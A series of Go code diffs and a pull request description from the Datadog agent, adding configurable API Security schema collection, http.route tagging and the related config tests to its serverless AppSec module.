-				sampleRate: defaultAPISecSampleRate,
-			},
-			{
-				name:       "disabled",
-				enabledVar: "false",
-				sampleRate: defaultAPISecSampleRate,
-			},
-			{
-				name:       "disabled",
-				enabledVar: "0",
-				sampleRate: defaultAPISecSampleRate,
-			},
-			{
-				name:       "disabled",
-				enabledVar: "weirdvalue",
-				sampleRate: defaultAPISecSampleRate,
-			},
-			{
-				name:       "enabled",
-				enabledVar: "true",
-				enabled:    true,
-				sampleRate: defaultAPISecSampleRate,
-			},
-			{
-				name:       "enabled",
-				enabledVar: "1",
-				enabled:    true,
-				sampleRate: defaultAPISecSampleRate,
-			},
-			{
-				name:          "sampleRate 1.0",
-				enabledVar:    "true",
-				sampleRateVar: "1.0",
-				enabled:       true,
-				sampleRate:    1.0,
-			},
-		} {
-			t.Run(tc.name, func(t *testing.T) {
-				t.Setenv(apiSecurityEnabledEnvVar, tc.enabledVar)
-				t.Setenv(apiSecuritySampleRateEnvVar, tc.sampleRateVar)
-				Refresh()
-				require.Equal(t, tc.enabled, APISecurityEnabled())
-				require.Equal(t, tc.sampleRate, APISecuritySampleRate())
-			})
-		}
-
-	})
-}
-
-func cleanEnv() func() {
-	env := map[string]string{
-		wafTimeoutEnvVar:      os.Getenv(wafTimeoutEnvVar),
-		rulesEnvVar:           os.Getenv(rulesEnvVar),
-		traceRateLimitEnvVar:  os.Getenv(traceRateLimitEnvVar),
-		obfuscatorKeyEnvVar:   os.Getenv(obfuscatorKeyEnvVar),
-		obfuscatorValueEnvVar: os.Getenv(obfuscatorValueEnvVar),
-	}
-	for k := range env {
-		if err := os.Unsetenv(k); err != nil {
-			panic(err)
-		}
-	}
-	return func() {
-		for k, v := range env {
-			restoreEnv(k, v)
-		}
-	}
-}
-
-func restoreEnv(key, value string) {
-	if value != "" {
-		if err := os.Setenv(key, value); err != nil {
-			panic(err)
-		}
-	} else {
-		if err := os.Unsetenv(key); err != nil {
-			panic(err)
-		}
-	}
 }

--- a/pkg/serverless/appsec/config/config_test.go
+++ b/pkg/serverless/appsec/config/config_test.go
@@ -287,8 +287,66 @@ func TestConfig(t *testing.T) {
 				if tc.env != "" {
 					require.NoError(t, os.Setenv(tracingEnabledEnvVar, tc.env))
 				}
-				standalone = isStandalone()
+				Refresh()
 				require.Equal(t, tc.standalone, IsStandalone())
+			})
+		}
+
+	})
+
+	t.Run("api security", func(t *testing.T) {
+		for _, tc := range []struct {
+			name          string
+			enabledVar    string
+			sampleRateVar string
+			enabled       bool
+			sampleRate    float64
+		}{
+			{
+				name:       "disabled",
+				sampleRate: defaultAPISecSampleRate,
+			},
+			{
+				name:       "disabled",
+				enabledVar: "false",
+				sampleRate: defaultAPISecSampleRate,
+			},
+			{
+				name:       "disabled",
+				enabledVar: "0",
+				sampleRate: defaultAPISecSampleRate,
+			},
+			{
+				name:       "disabled",
+				enabledVar: "weirdvalue",
+				sampleRate: defaultAPISecSampleRate,
+			},
+			{
+				name:       "enabled",
+				enabledVar: "true",
+				enabled:    true,
+				sampleRate: defaultAPISecSampleRate,
+			},
+			{
+				name:       "enabled",
+				enabledVar: "1",
+				enabled:    true,
+				sampleRate: defaultAPISecSampleRate,
+			},
+			{
+				name:          "sampleRate 1.0",
+				enabledVar:    "true",
+				sampleRateVar: "1.0",
+				enabled:       true,
+				sampleRate:    1.0,
+			},
+		} {
+			t.Run(tc.name, func(t *testing.T) {
+				t.Setenv(apiSecurityEnabledEnvVar, tc.enabledVar)
+				t.Setenv(apiSecuritySampleRateEnvVar, tc.sampleRateVar)
+				Refresh()
+				require.Equal(t, tc.enabled, APISecurityEnabled())
+				require.Equal(t, tc.sampleRate, APISecuritySampleRate())
 			})
 		}
 

--- a/pkg/serverless/appsec/config/config_test.go
+++ b/pkg/serverless/appsec/config/config_test.go
@@ -13,8 +13,10 @@ import (
 )
 
 func TestConfig(t *testing.T) {
+	defaultRules, err := appsec.RulesFromEnv()
+	require.NoError(t, err)
 	expectedDefaultConfig := &Config{
-		Rules:          []byte(appsec.StaticRecommendedRules),
+		Rules:          defaultRules,
 		WafTimeout:     appsec.WAFTimeoutFromEnv(),
 		TraceRateLimit: appsec.RateLimitFromEnv(),
 		Obfuscator:     appsec.NewObfuscatorConfig(),

--- a/pkg/serverless/appsec/httpsec/http.go
+++ b/pkg/serverless/appsec/httpsec/http.go
@@ -31,7 +31,7 @@ import (
 // subprocessor monitoring the given security rules addresses and returning
 // the security events that matched.
 type Monitorer interface {
-	Monitor(addresses map[string]any) waf.Result
+	Monitor(addresses map[string]any) *waf.Result
 }
 
 // AppSec monitoring context including the full list of monitored HTTP values

--- a/pkg/serverless/appsec/httpsec/http.go
+++ b/pkg/serverless/appsec/httpsec/http.go
@@ -24,13 +24,14 @@ import (
 	"strings"
 
 	"github.com/DataDog/datadog-agent/pkg/util/log"
+	waf "github.com/DataDog/go-libddwaf/v2"
 )
 
 // Monitorer is the interface type expected by the httpsec invocation
 // subprocessor monitoring the given security rules addresses and returning
 // the security events that matched.
 type Monitorer interface {
-	Monitor(addresses map[string]any) (events []any)
+	Monitor(addresses map[string]any) waf.Result
 }
 
 // AppSec monitoring context including the full list of monitored HTTP values

--- a/pkg/serverless/appsec/httpsec/http.go
+++ b/pkg/serverless/appsec/httpsec/http.go
@@ -39,6 +39,7 @@ type Monitorer interface {
 // required context to report appsec-related span tags.
 type context struct {
 	requestSourceIP   string
+	requestRoute      *string             // http.route
 	requestClientIP   *string             // http.client_ip
 	requestRawURI     *string             // server.request.uri.raw
 	requestHeaders    map[string][]string // server.request.headers.no_cookies
@@ -50,11 +51,12 @@ type context struct {
 }
 
 // makeContext creates a http monitoring context out of the provided arguments.
-func makeContext(ctx *context, path *string, headers, queryParams map[string][]string, pathParams map[string]string, sourceIP string, rawBody *string, isBodyBase64 bool) {
+func makeContext(ctx *context, route, path *string, headers, queryParams map[string][]string, pathParams map[string]string, sourceIP string, rawBody *string, isBodyBase64 bool) {
 	headers, rawCookies := filterHeaders(headers)
 	cookies := parseCookies(rawCookies)
 	body := parseBody(headers, rawBody, isBodyBase64)
 	*ctx = context{
+		requestRoute:      route,
 		requestSourceIP:   sourceIP,
 		requestRawURI:     path,
 		requestHeaders:    headers,

--- a/pkg/serverless/appsec/httpsec/proxy.go
+++ b/pkg/serverless/appsec/httpsec/proxy.go
@@ -204,7 +204,7 @@ func (lp *ProxyLifecycleProcessor) spanModifier(lastReqId string, chunk *pb.Trac
 	case *events.ALBTargetGroupRequest:
 		makeContext(
 			&ctx,
-			&event.Path,
+			nil,
 			&event.Path,
 			event.MultiValueHeaders,
 			event.MultiValueQueryStringParameters,
@@ -217,7 +217,7 @@ func (lp *ProxyLifecycleProcessor) spanModifier(lastReqId string, chunk *pb.Trac
 	case *events.LambdaFunctionURLRequest:
 		makeContext(
 			&ctx,
-			&event.RawPath,
+			nil,
 			&event.RawPath,
 			toMultiValueMap(event.Headers),
 			toMultiValueMap(event.QueryStringParameters),

--- a/pkg/serverless/appsec/httpsec/proxy.go
+++ b/pkg/serverless/appsec/httpsec/proxy.go
@@ -237,9 +237,11 @@ func (lp *ProxyLifecycleProcessor) spanModifier(lastReqId string, chunk *pb.Trac
 		log.Debug("appsec: missing span tag http.status_code")
 	}
 
-	if events := lp.appsec.Monitor(ctx.toAddresses()); len(events) > 0 {
-		setSecurityEventsTags(span, events, reqHeaders, nil)
+	if res := lp.appsec.Monitor(ctx.toAddresses()); len(res.Events) > 0 {
+		setSecurityEventsTags(span, res.Events, reqHeaders, nil)
 		chunk.Priority = int32(sampler.PriorityUserKeep)
+
+		setAPISecurityTags(span, res.Derivatives)
 	}
 }
 

--- a/pkg/serverless/appsec/httpsec/proxy.go
+++ b/pkg/serverless/appsec/httpsec/proxy.go
@@ -138,6 +138,7 @@ func (lp *ProxyLifecycleProcessor) spanModifier(lastReqId string, chunk *pb.Trac
 	case *events.APIGatewayProxyRequest:
 		makeContext(
 			&ctx,
+			&event.Resource,
 			&event.Path,
 			event.MultiValueHeaders,
 			event.MultiValueQueryStringParameters,
@@ -150,6 +151,7 @@ func (lp *ProxyLifecycleProcessor) spanModifier(lastReqId string, chunk *pb.Trac
 	case *events.APIGatewayV2HTTPRequest:
 		makeContext(
 			&ctx,
+			&event.RouteKey,
 			&event.RawPath,
 			toMultiValueMap(event.Headers),
 			toMultiValueMap(event.QueryStringParameters),
@@ -162,6 +164,7 @@ func (lp *ProxyLifecycleProcessor) spanModifier(lastReqId string, chunk *pb.Trac
 	case *events.APIGatewayWebsocketProxyRequest:
 		makeContext(
 			&ctx,
+			&event.Resource,
 			&event.Path,
 			event.MultiValueHeaders,
 			event.MultiValueQueryStringParameters,
@@ -175,6 +178,7 @@ func (lp *ProxyLifecycleProcessor) spanModifier(lastReqId string, chunk *pb.Trac
 		makeContext(
 			&ctx,
 			nil,
+			nil,
 			// NOTE: The header name could have been different (depends on API GW configuration)
 			map[string][]string{"Authorization": {event.AuthorizationToken}},
 			nil,
@@ -187,6 +191,7 @@ func (lp *ProxyLifecycleProcessor) spanModifier(lastReqId string, chunk *pb.Trac
 	case *events.APIGatewayCustomAuthorizerRequestTypeRequest:
 		makeContext(
 			&ctx,
+			&event.Resource,
 			&event.Path,
 			event.MultiValueHeaders,
 			event.MultiValueQueryStringParameters,
@@ -200,6 +205,7 @@ func (lp *ProxyLifecycleProcessor) spanModifier(lastReqId string, chunk *pb.Trac
 		makeContext(
 			&ctx,
 			&event.Path,
+			&event.Path,
 			event.MultiValueHeaders,
 			event.MultiValueQueryStringParameters,
 			nil,
@@ -211,6 +217,7 @@ func (lp *ProxyLifecycleProcessor) spanModifier(lastReqId string, chunk *pb.Trac
 	case *events.LambdaFunctionURLRequest:
 		makeContext(
 			&ctx,
+			&event.RawPath,
 			&event.RawPath,
 			toMultiValueMap(event.Headers),
 			toMultiValueMap(event.QueryStringParameters),
@@ -237,10 +244,12 @@ func (lp *ProxyLifecycleProcessor) spanModifier(lastReqId string, chunk *pb.Trac
 		log.Debug("appsec: missing span tag http.status_code")
 	}
 
-	if res := lp.appsec.Monitor(ctx.toAddresses()); len(res.Events) > 0 {
+	if res := lp.appsec.Monitor(ctx.toAddresses()); res.HasEvents() {
 		setSecurityEventsTags(span, res.Events, reqHeaders, nil)
 		chunk.Priority = int32(sampler.PriorityUserKeep)
-
+		if ctx.requestRoute != nil {
+			span.SetMetaTag("http.route", *ctx.requestRoute)
+		}
 		setAPISecurityTags(span, res.Derivatives)
 	}
 }

--- a/pkg/serverless/appsec/httpsec/tags.go
+++ b/pkg/serverless/appsec/httpsec/tags.go
@@ -120,6 +120,17 @@ func setSecurityEventsTags(span span, events []any, headers, respHeaders map[str
 	}
 }
 
+// setAPISecurityEventsTags sets the AppSec-specific span tags related to API security schemas
+func setAPISecurityTags(span span, derivatives map[string]any) {
+	for key, val := range derivatives {
+		if rawVal, err := json.Marshal(val); err != nil {
+			log.Errorf("appsec: unexpected error while creating the API security tags: %v", err)
+		} else {
+			span.SetMetaTag(key, string(rawVal))
+		}
+	}
+}
+
 // normalizeHTTPHeaders returns the HTTP headers following Datadog's
 // normalization format.
 func normalizeHTTPHeaders(headers map[string][]string) (normalized map[string]string) {


### PR DESCRIPTION
### What does this PR do?

- Add an env var `DD_EXPERIMENTAL_API_SECURITY_ENABLED` to configure API Security enablement
- Add an env var `DD_API_SECURITY_REQUEST_SAMPLE_RATE` to configure the sampling rate of schema collection
- Update WAF addresses to trigger schema collection if API Sec is enabled and sampling rate allows it
- Add schema reporting tests
- Switch to shared configuration from appsec-internal-go

### Motivation

<!--
* What inspired you to submit this pull request?
* Link any related GitHub issues or PRs here.
-->

### Additional Notes

<!--
* Anything else we should know when reviewing?
* Include benchmarking information here whenever possible.
* Include info about alternatives that were considered and why the proposed
  version was chosen.
-->

### Possible Drawbacks / Trade-offs

<!--
* What are the possible side-effects or negative impacts of the code change?
-->

### Describe how to test/QA your changes

<!--
* Write here in detail or link to detailed instructions on how this change can
  be tested/QAd/validated, including any environment setup.
-->

### Reviewer's Checklist
<!--
* Authors can use this list as a reference to ensure that there are no problems
  during the review but the signing off is to be done by the reviewer(s).

Note: Adding GitHub labels is only possible for contributors with write access.
-->

- [ ] If known, an appropriate milestone has been selected; otherwise the `Triage` milestone is set.
- [ ] Use the `major_change` label if your change either has a major impact on the code base, is impacting multiple teams or is changing important well-established internals of the Agent. This label will be use during QA to make sure each team pay extra attention to the changed behavior. For any customer facing change use a releasenote.
- [ ] A [release note](https://github.com/DataDog/datadog-agent/blob/main/docs/dev/contributing.md#reno) has been added or the `changelog/no-changelog` label has been applied.
- [ ] Changed code has automated tests for its functionality.
- [ ] Adequate QA/testing plan information is provided if the `qa/skip-qa` label is not applied.
- [ ] At least one `team/..` label has been applied, indicating the team(s) that should QA this change.
- [ ] If applicable, docs team has been notified or [an issue has been opened on the documentation repo](https://github.com/DataDog/documentation/issues/new).
- [ ] If applicable, the `need-change/operator` and `need-change/helm` labels have been applied.
- [ ] If applicable, the `k8s/<min-version>` label, indicating the lowest Kubernetes version compatible with this feature.
- [ ] If applicable, the [config template](https://github.com/DataDog/datadog-agent/blob/main/pkg/config/config_template.yaml) has been updated.
